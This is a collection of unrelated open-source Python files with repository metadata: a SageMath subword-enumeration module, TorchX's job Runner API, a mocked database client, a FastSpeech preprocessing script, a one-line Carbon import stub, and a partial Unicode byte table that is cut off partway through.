contrib/tools/python/src/Lib/plat-mac/Carbon/Qdoffs.py
|
HeyLey/catboost
| 6,989 |
75216
|
<reponame>HeyLey/catboost
from _Qdoffs import *
|
src/sage/combinat/subword.py
|
hsm207/sage
| 1,742 |
75223
|
<filename>src/sage/combinat/subword.py
r"""
Subwords
A subword of a word `w` is a word obtained by deleting the letters at some
(non necessarily adjacent) positions in `w`. It is not to be confused with the
notion of factor where one keeps adjacent positions in `w`. Sometimes it is
useful to allow repeated uses of the same letter of `w` in a "generalized"
subword. We call this a subword with repetitions.
For example:
- "bnjr" is a subword of the word "bonjour" but not a factor;
- "njo" is both a factor and a subword of the word "bonjour";
- "nr" is a subword of "bonjour";
- "rn" is not a subword of "bonjour";
- "nnu" is not a subword of "bonjour";
- "nnu" is a subword with repetitions of "bonjour";
A word can be given either as a string, as a list or as a tuple.
As repetition can occur in the initial word, the subwords of a given words is
not a set in general but an enumerated multiset!
.. TODO::
- implement subwords with repetitions
- implement the category of EnumeratedMultiset and inheritate from
when needed (i.e. the initial word has repeated letters)
AUTHORS:
- <NAME>: initial version
- <NAME> (2009/02/06): doc improvements + new methods + bug fixes
"""
#*****************************************************************************
# Copyright (C) 2007 <NAME> <<EMAIL>>,
# 2014 <NAME> <<EMAIL>>,
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
import itertools
from sage.structure.parent import Parent
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
import sage.arith.all as arith
import sage.misc.prandom as prandom
from sage.rings.integer import Integer
from sage.sets.finite_enumerated_set import FiniteEnumeratedSet
def _stringification(data):
r"""
TESTS::
sage: from sage.combinat.subword import _stringification
sage: _stringification(['a','b','c'])
'abc'
"""
return ''.join(data)
def Subwords(w, k=None, element_constructor=None):
"""
Return the set of subwords of ``w``.
INPUT:
- ``w`` -- a word (can be a list, a string, a tuple or a word)
- ``k`` -- an optional integer to specify the length of subwords
- ``element_constructor`` -- an optional function that will be used
to build the subwords
EXAMPLES::
sage: S = Subwords(['a','b','c']); S
Subwords of ['a', 'b', 'c']
sage: S.first()
[]
sage: S.last()
['a', 'b', 'c']
sage: S.list()
[[], ['a'], ['b'], ['c'], ['a', 'b'], ['a', 'c'], ['b', 'c'], ['a', 'b', 'c']]
The same example using string, tuple or a word::
sage: S = Subwords('abc'); S
Subwords of 'abc'
sage: S.list()
['', 'a', 'b', 'c', 'ab', 'ac', 'bc', 'abc']
sage: S = Subwords((1,2,3)); S
Subwords of (1, 2, 3)
sage: S.list()
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
sage: w = Word([1,2,3])
sage: S = Subwords(w); S
Subwords of word: 123
sage: S.list()
[word: , word: 1, word: 2, word: 3, word: 12, word: 13, word: 23, word: 123]
Using word with specified length::
sage: S = Subwords(['a','b','c'], 2); S
Subwords of ['a', 'b', 'c'] of length 2
sage: S.list()
[['a', 'b'], ['a', 'c'], ['b', 'c']]
An example that uses the ``element_constructor`` argument::
sage: p = Permutation([3,2,1])
sage: Subwords(p, element_constructor=tuple).list()
[(), (3,), (2,), (1,), (3, 2), (3, 1), (2, 1), (3, 2, 1)]
sage: Subwords(p, 2, element_constructor=tuple).list()
[(3, 2), (3, 1), (2, 1)]
"""
if element_constructor is None:
datatype = type(w) # 'datatype' is the type of w
if datatype is list or datatype is tuple:
element_constructor = datatype
elif datatype is str:
element_constructor = _stringification
else:
from sage.combinat.words.words import Words
try:
alphabet = w.parent().alphabet()
element_constructor = Words(alphabet)
except AttributeError:
element_constructor = list
if k is None:
return Subwords_w(w, element_constructor)
if not isinstance(k, (int, Integer)):
raise ValueError("k should be an integer")
if k < 0 or k > len(w):
return FiniteEnumeratedSet([])
return Subwords_wk(w, k, element_constructor)
class Subwords_w(Parent):
r"""
Subwords of a given word.
"""
def __init__(self, w, element_constructor):
"""
TESTS::
sage: TestSuite(Subwords([1,2,3])).run()
sage: TestSuite(Subwords('sage')).run()
"""
Parent.__init__(self, category=FiniteEnumeratedSets())
self._w = w
self._build = element_constructor
def __eq__(self, other):
r"""
Equality test.
TESTS::
sage: Subwords([1,2,3]) == Subwords([1,2,3])
True
sage: Subwords([1,2,3]) == Subwords([1,3,2])
False
"""
return self.__class__ == other.__class__ and self._w == other._w and self._build == other._build
def __ne__(self, other):
r"""
TESTS::
sage: Subwords([1,2,3]) != Subwords([1,2,3])
False
sage: Subwords([1,2,3]) != Subwords([1,3,2])
True
"""
return not self == other
def __reduce__(self):
r"""
Pickle (how to construct back the object).
TESTS::
sage: S = Subwords((1,2,3))
sage: S == loads(dumps(S))
True
sage: S = Subwords('123')
sage: S == loads(dumps(S))
True
sage: S = Subwords(('a',(1,2,3),('a','b'),'ir'))
sage: S == loads(dumps(S))
True
"""
return (Subwords_w, (self._w, self._build))
def __repr__(self):
"""
TESTS::
sage: repr(Subwords([1,2,3])) # indirect doctest
'Subwords of [1, 2, 3]'
"""
return "Subwords of {!r}".format(self._w)
def __contains__(self, w):
"""
TESTS::
sage: [] in Subwords([1,2,3,4,3,4,4])
True
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4])
True
sage: [5,5,3] in Subwords([1,3,3,5,4,5,3,5])
True
sage: [3,5,5,3] in Subwords([1,3,3,5,4,5,3,5])
True
sage: [3,5,5,3,4] in Subwords([1,3,3,5,4,5,3,5])
False
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4])
True
sage: [2,3,3,1] in Subwords([1,2,3,4,3,4,4])
False
"""
return smallest_positions(self._w, w) is not False
def cardinality(self):
"""
EXAMPLES::
sage: Subwords([1,2,3]).cardinality()
8
"""
return Integer(1) << len(self._w)
def first(self):
"""
EXAMPLES::
sage: Subwords([1,2,3]).first()
[]
sage: Subwords((1,2,3)).first()
()
sage: Subwords('123').first()
''
"""
return self._build([])
def last(self):
"""
EXAMPLES::
sage: Subwords([1,2,3]).last()
[1, 2, 3]
sage: Subwords((1,2,3)).last()
(1, 2, 3)
sage: Subwords('123').last()
'123'
"""
return self._build(self._w)
def random_element(self):
r"""
Return a random subword with uniform law.
EXAMPLES::
sage: S1 = Subwords([1,2,3,2,1,3])
sage: S2 = Subwords([4,6,6,6,7,4,5,5])
sage: for i in range(100):
....: w = S1.random_element()
....: if w in S2:
....: assert(w == [])
sage: for i in range(100):
....: w = S2.random_element()
....: if w in S1:
....: assert(w == [])
"""
return self._build(elt for elt in self._w if prandom.randint(0,1))
def __iter__(self):
r"""
EXAMPLES::
sage: Subwords([1,2,3]).list()
[[], [1], [2], [3], [1, 2], [1, 3], [2, 3], [1, 2, 3]]
sage: Subwords((1,2,3)).list()
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
sage: Subwords('123').list()
['', '1', '2', '3', '12', '13', '23', '123']
"""
return itertools.chain(*[ Subwords_wk(self._w,i,self._build)
for i in range(len(self._w)+1) ])
class Subwords_wk(Subwords_w):
r"""
Subwords with fixed length of a given word.
"""
def __init__(self, w, k, element_constructor):
"""
TESTS::
sage: S = Subwords([1,2,3],2)
sage: S == loads(dumps(S))
True
sage: TestSuite(S).run()
"""
Subwords_w.__init__(self, w, element_constructor)
self._k = k
def __eq__(self, other):
r"""
Equality test.
TESTS::
sage: Subwords([1,2,3],2) == Subwords([1,2,3],2)
True
sage: Subwords([1,2,3],2) == Subwords([1,3,2],2)
False
sage: Subwords([1,2,3],2) == Subwords([1,2,3],3)
False
"""
return Subwords_w.__eq__(self, other) and self._k == other._k
def __reduce__(self):
r"""
Pickle (how to construct back the object).
TESTS::
sage: S = Subwords('abc',2)
sage: S == loads(dumps(S))
True
sage: S = Subwords(('a',1,'45',(1,2)))
sage: S == loads(dumps(S))
True
"""
return (Subwords_wk, (self._w, self._k, self._build))
def __repr__(self):
"""
TESTS::
sage: repr(Subwords([1,2,3],2)) # indirect doctest
'Subwords of [1, 2, 3] of length 2'
"""
return "{} of length {}".format(Subwords_w.__repr__(self), self._k)
def __contains__(self, w):
"""
TESTS::
sage: [] in Subwords([1, 3, 3, 5, 4, 5, 3, 5],0)
True
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4],4)
True
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4],3)
False
sage: [5,5,3] in Subwords([1,3,3,5,4,5,3,5],3)
True
sage: [5,5,3] in Subwords([1,3,3,5,4,5,3,5],4)
False
"""
return len(w) == self._k and Subwords_w.__contains__(self,w)
def cardinality(self):
r"""
Returns the number of subwords of w of length k.
EXAMPLES::
sage: Subwords([1,2,3], 2).cardinality()
3
"""
return arith.binomial(Integer(len(self._w)), self._k)
def first(self):
r"""
EXAMPLES::
sage: Subwords([1,2,3],2).first()
[1, 2]
sage: Subwords([1,2,3],0).first()
[]
sage: Subwords((1,2,3),2).first()
(1, 2)
sage: Subwords((1,2,3),0).first()
()
sage: Subwords('123',2).first()
'12'
sage: Subwords('123',0).first()
''
"""
return self._build(self._w[i] for i in range(self._k))
def last(self):
r"""
EXAMPLES::
sage: Subwords([1,2,3],2).last()
[2, 3]
sage: Subwords([1,2,3],0).last()
[]
sage: Subwords((1,2,3),2).last()
(2, 3)
sage: Subwords((1,2,3),0).last()
()
sage: Subwords('123',2).last()
'23'
sage: Subwords('123',0).last()
''
TESTS::
sage: Subwords('123', 0).last() # trac 10534
''
"""
n = len(self._w)
return self._build(self._w[i] for i in range(n-self._k, n))
def random_element(self):
r"""
Return a random subword of given length with uniform law.
EXAMPLES::
sage: S1 = Subwords([1,2,3,2,1],3)
sage: S2 = Subwords([4,4,5,5,4,5,4,4],3)
sage: for i in range(100):
....: w = S1.random_element()
....: if w in S2:
....: assert(w == [])
sage: for i in range(100):
....: w = S2.random_element()
....: if w in S1:
....: assert(w == [])
"""
sample = prandom.sample(self._w, self._k)
if self._build is list:
return sample
return self._build(sample)
def __iter__(self):
"""
EXAMPLES::
sage: Subwords([1,2,3],2).list()
[[1, 2], [1, 3], [2, 3]]
sage: Subwords([1,2,3],0).list()
[[]]
sage: Subwords((1,2,3),2).list()
[(1, 2), (1, 3), (2, 3)]
sage: Subwords((1,2,3),0).list()
[()]
sage: Subwords('abc',2).list()
['ab', 'ac', 'bc']
sage: Subwords('abc',0).list()
['']
"""
if self._k > len(self._w):
return iter([])
iterator = itertools.combinations(self._w, self._k)
if self._build is tuple:
return iterator
else:
return (self._build(x) for x in iterator)
def smallest_positions(word, subword, pos=0):
"""
Return the smallest positions for which ``subword`` appears as a
subword of ``word``. If ``pos`` is specified, then it returns the positions
of the first appearance of subword starting at ``pos``.
If ``subword`` is not found in ``word``, then return ``False``.
EXAMPLES::
sage: sage.combinat.subword.smallest_positions([1,2,3,4], [2,4])
[1, 3]
sage: sage.combinat.subword.smallest_positions([1,2,3,4,4], [2,4])
[1, 3]
sage: sage.combinat.subword.smallest_positions([1,2,3,3,4,4], [3,4])
[2, 4]
sage: sage.combinat.subword.smallest_positions([1,2,3,3,4,4], [3,4],2)
[2, 4]
sage: sage.combinat.subword.smallest_positions([1,2,3,3,4,4], [3,4],3)
[3, 4]
sage: sage.combinat.subword.smallest_positions([1,2,3,4], [2,3])
[1, 2]
sage: sage.combinat.subword.smallest_positions([1,2,3,4], [5,5])
False
sage: sage.combinat.subword.smallest_positions([1,3,3,4,5],[3,5])
[1, 4]
sage: sage.combinat.subword.smallest_positions([1,3,3,5,4,5,3,5],[3,5,3])
[1, 3, 6]
sage: sage.combinat.subword.smallest_positions([1,3,3,5,4,5,3,5],[3,5,3],2)
[2, 3, 6]
sage: sage.combinat.subword.smallest_positions([1,2,3,4,3,4,4],[2,3,3,1])
False
sage: sage.combinat.subword.smallest_positions([1,3,3,5,4,5,3,5],[3,5,3],3)
False
TESTS:
We check for :trac:`5534`::
sage: w = ["a", "b", "c", "d"]; ww = ["b", "d"]
sage: x = sage.combinat.subword.smallest_positions(w, ww); ww
['b', 'd']
"""
pos -= 1
res = [None] * len(subword)
for i in range(len(subword)):
for j in range(pos + 1, len(word) + 1):
if j == len(word):
return False
if word[j] == subword[i]:
pos = j
break
if pos != j:
return False
res[i] = pos
return res
|
packages/core/minos-microservice-common/minos/common/testing/database/clients.py
|
minos-framework/minos-python
| 247 |
75231
|
from collections.abc import (
AsyncIterator,
)
from typing import (
Any,
)
from ...database import (
DatabaseClient,
)
from .operations import (
MockedDatabaseOperation,
)
class MockedDatabaseClient(DatabaseClient):
"""For testing purposes"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.kwargs = kwargs
self._response = tuple()
async def _reset(self, **kwargs) -> None:
"""For testing purposes"""
self._response = tuple()
async def _execute(self, operation: MockedDatabaseOperation) -> None:
"""For testing purposes"""
self._response = operation.response
async def _fetch_all(self, *args, **kwargs) -> AsyncIterator[Any]:
"""For testing purposes"""
for value in self._response:
yield value
|
preprocess.py
|
lcylcy/FastSpeech
| 745 |
75239
|
import torch
import numpy as np
import shutil
import os
from data import ljspeech
import hparams as hp
def preprocess_ljspeech(filename):
in_dir = filename
out_dir = hp.mel_ground_truth
if not os.path.exists(out_dir):
os.makedirs(out_dir, exist_ok=True)
metadata = ljspeech.build_from_path(in_dir, out_dir)
write_metadata(metadata, out_dir)
shutil.move(os.path.join(hp.mel_ground_truth, "train.txt"),
os.path.join("data", "train.txt"))
def write_metadata(metadata, out_dir):
with open(os.path.join(out_dir, 'train.txt'), 'w', encoding='utf-8') as f:
for m in metadata:
f.write(m + '\n')
def main():
path = os.path.join("data", "LJSpeech-1.1")
preprocess_ljspeech(path)
if __name__ == "__main__":
main()
|
torchx/runner/api.py
|
ldworkin/torchx
| 101 |
75241
|
<reponame>ldworkin/torchx
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import time
from datetime import datetime
from types import TracebackType
from typing import Any, Dict, Iterable, List, Mapping, Optional, Tuple, Type
from pyre_extensions import none_throws
from torchx.runner.events import log_event
from torchx.schedulers import get_schedulers
from torchx.schedulers.api import Scheduler, Stream
from torchx.specs import (
AppDef,
AppDryRunInfo,
AppHandle,
AppStatus,
CfgVal,
SchedulerBackend,
UnknownAppException,
from_function,
make_app_handle,
parse_app_handle,
runopts,
)
from torchx.specs.finder import get_component
logger: logging.Logger = logging.getLogger(__name__)
NONE: str = "<NONE>"
class Runner:
"""
TorchX individual component runner. Has the methods for the user to
act upon ``AppDefs``. The ``Runner`` will cache information about the
launched apps if they were launched locally otherwise it's up to the
specific scheduler implementation.
"""
def __init__(
self,
name: str,
schedulers: Dict[SchedulerBackend, Scheduler],
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
"""
Creates a new runner instance.
Args:
name: the human readable name for this session. Jobs launched will
inherit this name.
schedulers: a list of schedulers the runner can use.
"""
self._name: str = name
self._schedulers = schedulers
self._apps: Dict[AppHandle, AppDef] = {}
# component_name -> map of component_fn_param_name -> user-specified default val encoded as str
self._component_defaults: Dict[str, Dict[str, str]] = component_defaults or {}
def __enter__(self) -> "Runner":
return self
def __exit__(
self,
type: Optional[Type[BaseException]],
value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> bool:
# This method returns False so that if an error is raise within the
# ``with`` statement, it is reraised properly
# see: https://docs.python.org/3/reference/compound_stmts.html#with
# see also: torchx/runner/test/api_test.py#test_context_manager_with_error
#
self.close()
return False
def close(self) -> None:
"""
Closes this runner and frees/cleans up any allocated resources.
Transitively calls the ``close()`` method on all the schedulers.
Once this method is called on the runner, the runner object is deemed
invalid and any methods called on the runner object as well as
the schedulers associated with this runner have undefined behavior.
It is ok to call this method multiple times on the same runner object.
"""
for name, scheduler in self._schedulers.items():
scheduler.close()
def run_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs a component.
``component`` has the following resolution order(high to low):
* User-registered components. Users can register components via
https://packaging.python.org/specifications/entry-points/. Method looks for
entrypoints in the group ``torchx.components``.
* Builtin components relative to `torchx.components`. The path to the component should
be module name relative to `torchx.components` and function name in a format:
``$module.$function``.
* File-based components in format: ``$FILE_PATH:FUNCTION_NAME``. Both relative and
absolute paths supported.
Usage:
.. code-block:: python
# resolved to torchx.components.distributed.ddp()
runner.run_component("distributed.ddp", ...)
# resolved to my_component() function in ~/home/components.py
runner.run_component("~/home/components.py:my_component", ...)
Returns:
An application handle that is used to call other action APIs on the app
Raises:
ComponentValidationException: if component is invalid.
ComponentNotFoundException: if the ``component_path`` is failed to resolve.
"""
dryrun_info = self.dryrun_component(component, component_args, scheduler, cfg)
return self.schedule(dryrun_info)
def dryrun_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dryrun version of :py:func:`run_component`. Will not actually run the
component, but just returns what "would" have run.
"""
component_def = get_component(component)
app = from_function(
component_def.fn,
component_args,
self._component_defaults.get(component, None),
)
return self.dryrun(app, scheduler, cfg)
def run(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs the given application in the specified mode.
.. note:: sub-classes of ``Runner`` should implement ``schedule`` method
rather than overriding this method directly.
Returns:
An application handle that is used to call other action APIs on the app.
"""
dryrun_info = self.dryrun(app, scheduler, cfg)
return self.schedule(dryrun_info)
def schedule(self, dryrun_info: AppDryRunInfo) -> AppHandle:
"""
Actually runs the application from the given dryrun info.
Useful when one needs to overwrite a parameter in the scheduler
request that is not configurable from one of the object APIs.
.. warning:: Use sparingly since abusing this method to overwrite
many parameters in the raw scheduler request may
lead to your usage of TorchX going out of compliance
in the long term. This method is intended to
unblock the user from experimenting with certain
scheduler-specific features in the short term without
having to wait until TorchX exposes scheduler features
in its APIs.
.. note:: It is recommended that sub-classes of ``Session`` implement
this method instead of directly implementing the ``run`` method.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="default", cfg)
# overwrite parameter "foo" to "bar"
dryrun_info.request.foo = "bar"
app_handle = session.submit(dryrun_info)
"""
scheduler = none_throws(dryrun_info._scheduler)
cfg = dryrun_info._cfg
with log_event(
"schedule", scheduler, runcfg=json.dumps(cfg) if cfg else None
) as ctx:
sched = self._scheduler(scheduler)
app_id = sched.schedule(dryrun_info)
app_handle = make_app_handle(scheduler, self._name, app_id)
app = none_throws(dryrun_info._app)
self._apps[app_handle] = app
_, _, app_id = parse_app_handle(app_handle)
ctx._torchx_event.app_id = app_id
return app_handle
def name(self) -> str:
return self._name
def dryrun(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dry runs an app on the given scheduler with the provided run configs.
Does not actually submit the app but rather returns what would have been
submitted. The returned ``AppDryRunInfo`` is pretty formatted and can
be printed or logged directly.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="local", cfg)
print(dryrun_info)
"""
# input validation
if not app.roles:
raise ValueError(
f"No roles for app: {app.name}. Did you forget to add roles to AppDef?"
)
for role in app.roles:
if not role.entrypoint:
raise ValueError(
f"No entrypoint for role: {role.name}."
f" Did you forget to call role.runs(entrypoint, args, env)?"
)
if role.num_replicas <= 0:
raise ValueError(
f"Non-positive replicas for role: {role.name}."
f" Did you forget to set role.num_replicas?"
)
cfg = cfg or dict()
with log_event("dryrun", scheduler, runcfg=json.dumps(cfg) if cfg else None):
sched = self._scheduler(scheduler)
sched._validate(app, scheduler)
dryrun_info = sched.submit_dryrun(app, cfg)
dryrun_info._scheduler = scheduler
return dryrun_info
def run_opts(self) -> Dict[str, runopts]:
"""
Returns the ``runopts`` for the supported scheduler backends.
Usage:
::
local_runopts = session.run_opts()["local"]
print("local scheduler run options: {local_runopts}")
Returns:
A map of scheduler backend to its ``runopts``
"""
return {
scheduler_backend: scheduler.run_opts()
for scheduler_backend, scheduler in self._schedulers.items()
}
def scheduler_backends(self) -> List[SchedulerBackend]:
"""
Returns a list of all supported scheduler backends.
"""
return list(self._schedulers.keys())
def status(self, app_handle: AppHandle) -> Optional[AppStatus]:
"""
Returns:
The status of the application, or ``None`` if the app does not exist anymore
(e.g. was stopped in the past and removed from the scheduler's backend).
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("status", scheduler_backend, app_id):
desc = scheduler.describe(app_id)
if not desc:
# app does not exist on the scheduler
# remove it from apps cache if it exists
# effectively removes this app from the list() API
self._apps.pop(app_handle, None)
return None
app_status = AppStatus(
desc.state,
desc.num_restarts,
msg=desc.msg,
structured_error_msg=desc.structured_error_msg,
roles=desc.roles_statuses,
)
if app_status:
app_status.ui_url = desc.ui_url
return app_status
def wait(
self, app_handle: AppHandle, wait_interval: float = 10
) -> Optional[AppStatus]:
"""
Block waits (indefinitely) for the application to complete.
Possible implementation:
::
while(True):
app_status = status(app)
if app_status.is_terminal():
return
sleep(10)
Args:
app_handle: the app handle to wait for completion
wait_interval: the minimum interval to wait before polling for status
Returns:
The terminal status of the application, or ``None`` if the app does not exist anymore
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("wait", scheduler_backend, app_id):
while True:
app_status = self.status(app_handle)
if not app_status:
return None
if app_status.is_terminal():
return app_status
else:
time.sleep(wait_interval)
def list(self) -> Dict[AppHandle, AppDef]:
"""
Returns the applications that were run with this session mapped by the app handle.
The persistence of the session is implementation dependent.
"""
with log_event("list"):
app_ids = list(self._apps.keys())
for app_id in app_ids:
self.status(app_id)
return self._apps
def stop(self, app_handle: AppHandle) -> None:
"""
Stops the application, effectively directing the scheduler to cancel
the job. Does nothing if the app does not exist.
.. note:: This method returns as soon as the cancel request has been
submitted to the scheduler. The application will be in a
``RUNNING`` state until the scheduler actually terminates
the job. If the scheduler successfully interrupts the job
and terminates it the final state will be ``CANCELLED``
otherwise it will be ``FAILED``.
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(app_handle)
with log_event("stop", scheduler_backend, app_id):
status = self.status(app_handle)
if status is not None and not status.is_terminal():
scheduler.cancel(app_id)
def describe(self, app_handle: AppHandle) -> Optional[AppDef]:
"""
Reconstructs the application (to the best extent) given the app handle.
Note that the reconstructed application may not be the complete app as
it was submitted via the run API. How much of the app can be reconstructed
is scheduler dependent.
Returns:
AppDef or None if the app does not exist anymore or if the
scheduler does not support describing the app handle
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("describe", scheduler_backend, app_id):
# if the app is in the apps list, then short circuit everything and return it
app = self._apps.get(app_handle, None)
if not app:
desc = scheduler.describe(app_id)
if desc:
app = AppDef(name=app_id, roles=desc.roles)
return app
def log_lines(
self,
app_handle: AppHandle,
role_name: str,
k: int = 0,
regex: Optional[str] = None,
since: Optional[datetime] = None,
until: Optional[datetime] = None,
should_tail: bool = False,
streams: Optional[Stream] = None,
) -> Iterable[str]:
"""
Returns an iterator over the log lines of the specified job container.
.. note:: #. ``k`` is the node (host) id NOT the ``rank``.
#. ``since`` and ``until`` need not always be honored (depends on scheduler).
.. warning:: The semantics and guarantees of the returned iterator is highly
scheduler dependent. See ``torchx.specs.api.Scheduler.log_iter``
for the high-level semantics of this log iterator. For this reason
it is HIGHLY DISCOURAGED to use this method for generating output
to pass to downstream functions/dependencies. This method
DOES NOT guarantee that 100% of the log lines are returned.
It is totally valid for this method to return no or partial log lines
if the scheduler has already totally or partially purged log records
for the application.
Usage:
::
app_handle = session.run(app, scheduler="local", cfg=Dict[str, ConfigValue]())
print("== trainer node 0 logs ==")
for line in session.log_lines(app_handle, "trainer", k=0):
print(line)
Discouraged anti-pattern:
::
# DO NOT DO THIS!
# parses accuracy metric from log and reports it for this experiment run
accuracy = -1
for line in session.log_lines(app_handle, "trainer", k=0):
if matches_regex(line, "final model_accuracy:[0-9]*"):
accuracy = parse_accuracy(line)
break
report(experiment_name, accuracy)
Args:
app_handle: application handle
role_name: role within the app (e.g. trainer)
k: k-th replica of the role to fetch the logs for
regex: optional regex filter, returns all lines if left empty
since: datetime based start cursor. If left empty begins from the
first log line (start of job).
until: datetime based end cursor. If left empty, follows the log output
until the job completes and all log lines have been consumed.
Returns:
An iterator over the role k-th replica of the specified application.
Raise:
UnknownAppException: if the app does not exist in the scheduler
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("log_lines", scheduler_backend, app_id):
if not self.status(app_handle):
raise UnknownAppException(app_handle)
log_iter = scheduler.log_iter(
app_id,
role_name,
k,
regex,
since,
until,
should_tail,
streams=streams,
)
return log_iter
def _scheduler(self, scheduler: SchedulerBackend) -> Scheduler:
sched = self._schedulers.get(scheduler)
if not sched:
raise KeyError(
f"Undefined scheduler backend: {scheduler}. Use one of: {self._schedulers.keys()}"
)
return sched
def _scheduler_app_id(
self, app_handle: AppHandle, check_session: bool = True
) -> Tuple[Scheduler, str, str]:
"""
Returns the scheduler and app_id from the app_handle.
Set ``check_session`` to validate that the session name in the app handle
is the same as this session.
Raises:
ValueError: if ``check_session=True`` and the session in the app handle
does not match this session's name
KeyError: if no such scheduler backend exists
"""
scheduler_backend, _, app_id = parse_app_handle(app_handle)
scheduler = self._scheduler(scheduler_backend)
return scheduler, scheduler_backend, app_id
def __repr__(self) -> str:
return f"Runner(name={self._name}, schedulers={self._schedulers}, apps={self._apps})"
def get_runner(
name: Optional[str] = None,
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
**scheduler_params: Any,
) -> Runner:
"""
Convenience method to construct and get a Runner object. Usage:
.. code-block:: python
with get_runner() as runner:
app_handle = runner.run(component(args), scheduler="kubernetes", runcfg)
print(runner.status(app_handle))
Alternatively,
.. code-block:: python
runner = get_runner()
try:
app_handle = runner.run(component(args), scheduler="kubernetes", runcfg)
print(runner.status(app_handle))
finally:
runner.close()
Args:
name: human readable name that will be included as part of all launched
jobs.
scheduler_params: extra arguments that will be passed to the constructor
of all available schedulers.
"""
if not name:
name = "torchx"
schedulers = get_schedulers(session_name=name, **scheduler_params)
return Runner(name, schedulers, component_defaults)
|
test_files/uctable_N.py
|
garrettluu/js-adler32
| 224 |
75259
|
<filename>test_files/uctable_N.py
uctable = [ [ 48 ],
[ 49 ],
[ 50 ],
[ 51 ],
[ 52 ],
[ 53 ],
[ 54 ],
[ 55 ],
[ 56 ],
[ 57 ],
[ 194, 178 ],
[ 194, 179 ],
[ 194, 185 ],
[ 194, 188 ],
[ 194, 189 ],
[ 194, 190 ],
[ 217, 160 ],
[ 217, 161 ],
[ 217, 162 ],
[ 217, 163 ],
[ 217, 164 ],
[ 217, 165 ],
[ 217, 166 ],
[ 217, 167 ],
[ 217, 168 ],
[ 217, 169 ],
[ 219, 176 ],
[ 219, 177 ],
[ 219, 178 ],
[ 219, 179 ],
[ 219, 180 ],
[ 219, 181 ],
[ 219, 182 ],
[ 219, 183 ],
[ 219, 184 ],
[ 219, 185 ],
[ 223, 128 ],
[ 223, 129 ],
[ 223, 130 ],
[ 223, 131 ],
[ 223, 132 ],
[ 223, 133 ],
[ 223, 134 ],
[ 223, 135 ],
[ 223, 136 ],
[ 223, 137 ],
[ 224, 165, 166 ],
[ 224, 165, 167 ],
[ 224, 165, 168 ],
[ 224, 165, 169 ],
[ 224, 165, 170 ],
[ 224, 165, 171 ],
[ 224, 165, 172 ],
[ 224, 165, 173 ],
[ 224, 165, 174 ],
[ 224, 165, 175 ],
[ 224, 167, 166 ],
[ 224, 167, 167 ],
[ 224, 167, 168 ],
[ 224, 167, 169 ],
[ 224, 167, 170 ],
[ 224, 167, 171 ],
[ 224, 167, 172 ],
[ 224, 167, 173 ],
[ 224, 167, 174 ],
[ 224, 167, 175 ],
[ 224, 167, 180 ],
[ 224, 167, 181 ],
[ 224, 167, 182 ],
[ 224, 167, 183 ],
[ 224, 167, 184 ],
[ 224, 167, 185 ],
[ 224, 169, 166 ],
[ 224, 169, 167 ],
[ 224, 169, 168 ],
[ 224, 169, 169 ],
[ 224, 169, 170 ],
[ 224, 169, 171 ],
[ 224, 169, 172 ],
[ 224, 169, 173 ],
[ 224, 169, 174 ],
[ 224, 169, 175 ],
[ 224, 171, 166 ],
[ 224, 171, 167 ],
[ 224, 171, 168 ],
[ 224, 171, 169 ],
[ 224, 171, 170 ],
[ 224, 171, 171 ],
[ 224, 171, 172 ],
[ 224, 171, 173 ],
[ 224, 171, 174 ],
[ 224, 171, 175 ],
[ 224, 173, 166 ],
[ 224, 173, 167 ],
[ 224, 173, 168 ],
[ 224, 173, 169 ],
[ 224, 173, 170 ],
[ 224, 173, 171 ],
[ 224, 173, 172 ],
[ 224, 173, 173 ],
[ 224, 173, 174 ],
[ 224, 173, 175 ],
[ 224, 173, 178 ],
[ 224, 173, 179 ],
[ 224, 173, 180 ],
[ 224, 173, 181 ],
[ 224, 173, 182 ],
[ 224, 173, 183 ],
[ 224, 175, 166 ],
[ 224, 175, 167 ],
[ 224, 175, 168 ],
[ 224, 175, 169 ],
[ 224, 175, 170 ],
[ 224, 175, 171 ],
[ 224, 175, 172 ],
[ 224, 175, 173 ],
[ 224, 175, 174 ],
[ 224, 175, 175 ],
[ 224, 175, 176 ],
[ 224, 175, 177 ],
[ 224, 175, 178 ],
[ 224, 177, 166 ],
[ 224, 177, 167 ],
[ 224, 177, 168 ],
[ 224, 177, 169 ],
[ 224, 177, 170 ],
[ 224, 177, 171 ],
[ 224, 177, 172 ],
